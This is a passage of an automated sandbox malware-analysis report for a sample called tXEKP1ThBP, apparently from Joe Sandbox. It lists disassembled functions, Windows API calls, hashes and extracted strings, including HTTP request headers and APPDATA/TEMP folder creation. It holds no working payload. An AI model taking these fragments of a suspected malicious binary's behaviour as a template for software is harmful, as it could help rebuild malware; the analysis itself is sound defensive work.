                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                                        • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                                      • _free.LIBCMT ref: 1000A03A
                                                        • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                        • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                      • _free.LIBCMT ref: 1000A05C
                                                      • _free.LIBCMT ref: 1000A071
                                                      • _free.LIBCMT ref: 1000A07C
                                                      • _free.LIBCMT ref: 1000A09E
                                                      • _free.LIBCMT ref: 1000A0B1
                                                      • _free.LIBCMT ref: 1000A0BF
                                                      • _free.LIBCMT ref: 1000A0CA
                                                      • _free.LIBCMT ref: 1000A102
                                                      • _free.LIBCMT ref: 1000A109
                                                      • _free.LIBCMT ref: 1000A126
                                                      • _free.LIBCMT ref: 1000A13E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                      • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                                      • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                      • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                                      Function 04B2744A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 04B2748E
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B27167
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B27179
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B2718B
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B2719D
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B271AF
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B271C1
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B271D3
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B271E5
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B271F7
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B27209
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B2721B
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B2722D
                                                        • Part of subcall function 04B2714A: _free.LIBCMT ref: 04B2723F
                                                      • _free.LIBCMT ref: 04B27483
                                                        • Part of subcall function 04B21D29: HeapFree.KERNEL32(00000000,00000000,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?), ref: 04B21D3F
                                                        • Part of subcall function 04B21D29: GetLastError.KERNEL32(?,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?,?), ref: 04B21D51
                                                      • _free.LIBCMT ref: 04B274A5
                                                      • _free.LIBCMT ref: 04B274BA
                                                      • _free.LIBCMT ref: 04B274C5
                                                      • _free.LIBCMT ref: 04B274E7
                                                      • _free.LIBCMT ref: 04B274FA
                                                      • _free.LIBCMT ref: 04B27508
                                                      • _free.LIBCMT ref: 04B27513
                                                      • _free.LIBCMT ref: 04B2754B
                                                      • _free.LIBCMT ref: 04B27552
                                                      • _free.LIBCMT ref: 04B2756F
                                                      • _free.LIBCMT ref: 04B27587
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                      • Instruction ID: 0042593a84fcd87ffce622680b4168b57292db102ea8a42da350ec5295dfc9fc
                                                      • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                      • Instruction Fuzzy Hash: C6317C31600626EFEB25AE3CEA44B5AB7E8EF00354F10589AE46CD7191DF34F9409B28
                                                      Function 0040B0DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
                                                      • type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 0040B309
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
                                                      • _UnwindNestedFrames.LIBCMT ref: 0040B45F
                                                      • CallUnexpected.LIBVCRUNTIME ref: 0040B47A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2123188842-393685449
                                                      • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                      • Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
                                                      • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                      • Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA
                                                      Function 04CCA4DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 04CCA5D8
                                                      • type_info::operator==.LIBVCRUNTIME ref: 04CCA5FA
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 04CCA709
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 04CCA7DB
                                                      • _UnwindNestedFrames.LIBCMT ref: 04CCA85F
                                                      • CallUnexpected.LIBVCRUNTIME ref: 04CCA87A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2123188842-393685449
                                                      • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                      • Instruction ID: 9401c1fb2ad33a0a6d3150b7eebca5ece4a3da71d29f0abe7b72bc51d481dc58
                                                      • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                      • Instruction Fuzzy Hash: CBB17C7180020DEFDF19DFA4D988AAEBBB6BF04314B14415EE8116B211D732FA52DBA1
                                                      Function 04B1B342 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 04B1B43F
                                                      • type_info::operator==.LIBVCRUNTIME ref: 04B1B461
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 04B1B570
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 04B1B642
                                                      • _UnwindNestedFrames.LIBCMT ref: 04B1B6C6
                                                      • CallUnexpected.LIBVCRUNTIME ref: 04B1B6E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2123188842-393685449
                                                      • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                      • Instruction ID: 1d5a2464c0e72a453ded3e50dd4e5b9935996f1a7756416f661ee77b10c338e4
                                                      • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                      • Instruction Fuzzy Hash: 5BB14A71C04209EFDF25DFA8C8809AEBBB5FF08314B9441A9E8156B265D730FA51CF91
                                                      Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                      • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                      • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                      • String ID: APPDATA$TMPDIR
                                                      • API String ID: 1838500112-4048745339
                                                      • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                      • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                      • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                      • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                      Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                      • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                      • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                      • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                      • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                      Strings
                                                      • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                      • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                      • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                      • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: HeadersHttpRequest$H_prolog3_
                                                      • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      • API String ID: 1254599795-787135837
                                                      • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                      • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                      • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                      • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                      Function 004110E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 004110FB
                                                        • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                        • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                      • _free.LIBCMT ref: 00411107
                                                      • _free.LIBCMT ref: 00411112
                                                      • _free.LIBCMT ref: 0041111D
                                                      • _free.LIBCMT ref: 00411128
                                                      • _free.LIBCMT ref: 00411133
                                                      • _free.LIBCMT ref: 0041113E
                                                      • _free.LIBCMT ref: 00411149
                                                      • _free.LIBCMT ref: 00411154
                                                      • _free.LIBCMT ref: 00411162
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                      • Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
                                                      • Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                      • Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84
                                                      Function 04CD04E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                      • Instruction ID: 6c08590def3d92fdc4cc487d3cc0114e04f3051408613d03a1136624d56dcd01
                                                      • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                      • Instruction Fuzzy Hash: B821AB76900108BFDB41EF99C880DDE7BB9BF08248F04456AF6559B521DB32EA44DB84
                                                      Function 10006D58 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                      • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                                      • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                      • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                                      Function 04B2134C Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 04B21362
                                                        • Part of subcall function 04B21D29: HeapFree.KERNEL32(00000000,00000000,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?), ref: 04B21D3F
                                                        • Part of subcall function 04B21D29: GetLastError.KERNEL32(?,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?,?), ref: 04B21D51
                                                      • _free.LIBCMT ref: 04B2136E
                                                      • _free.LIBCMT ref: 04B21379
                                                      • _free.LIBCMT ref: 04B21384
                                                      • _free.LIBCMT ref: 04B2138F
                                                      • _free.LIBCMT ref: 04B2139A
                                                      • _free.LIBCMT ref: 04B213A5
                                                      • _free.LIBCMT ref: 04B213B0
                                                      • _free.LIBCMT ref: 04B213BB
                                                      • _free.LIBCMT ref: 04B213C9
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                      • Instruction ID: 9ec2b461d4c3eaecf751d6113489d6d3284b104c5a84c735654a8efb8a8f4dd2
                                                      • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                      • Instruction Fuzzy Hash: 3521967A90012CFFDB45EFA9D980DDE7FB9BF08244B0051A6E5199B121DB31EA54DB80
                                                      Function 0041A609 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlDecodePointer.NTDLL(?), ref: 0041A622
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                      • API String ID: 3527080286-3064271455
                                                      • Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                      • Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
                                                      • Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                      • Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E
                                                      Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                      • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                      • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2751267872-393685449
                                                      • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                      • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                      • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                      • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                      Function 10008F36 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$___from_strstr_to_strchr
                                                      • String ID:
                                                      • API String ID: 3409252457-0
                                                      • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                      • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                                      • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                      • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                                      Function 04B192EF Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,04B192CD), ref: 04B192FB
                                                      • GetModuleHandleW.KERNEL32(0041DFB8,?,?,04B192CD), ref: 04B19306
                                                      • GetModuleHandleW.KERNEL32(0041DFFC,?,?,04B192CD), ref: 04B19317
                                                      • GetProcAddress.KERNEL32(00000000,0041E018), ref: 04B19329
                                                      • GetProcAddress.KERNEL32(00000000,0041E034), ref: 04B19337
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B192CD), ref: 04B1935A
                                                      • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 04B19376
                                                      • CloseHandle.KERNEL32(0042AF60,?,?,04B192CD), ref: 04B19386
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                      • String ID:
                                                      • API String ID: 2565136772-0
                                                      • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                      • Instruction ID: 1576d82f06dd419a4af21cb5d8ba7deab78d2b967f5cc56e714ac87b2d0729d1
                                                      • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                      • Instruction Fuzzy Hash: 5A01B5F1F40321ABD7202F70BD08B9A3BA8EB8CB01B594171FD05D21B0DBACD401CA69
                                                      Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __RTC_Initialize.LIBCMT ref: 1000291D
                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                      • String ID:
                                                      • API String ID: 2442719207-0
                                                      • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                      • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                      • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                      • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                      Function 0040ABE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 0040AC17
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
                                                      • _ValidateLocalCookies.LIBCMT ref: 0040ACA8
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
                                                      • _ValidateLocalCookies.LIBCMT ref: 0040AD28
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
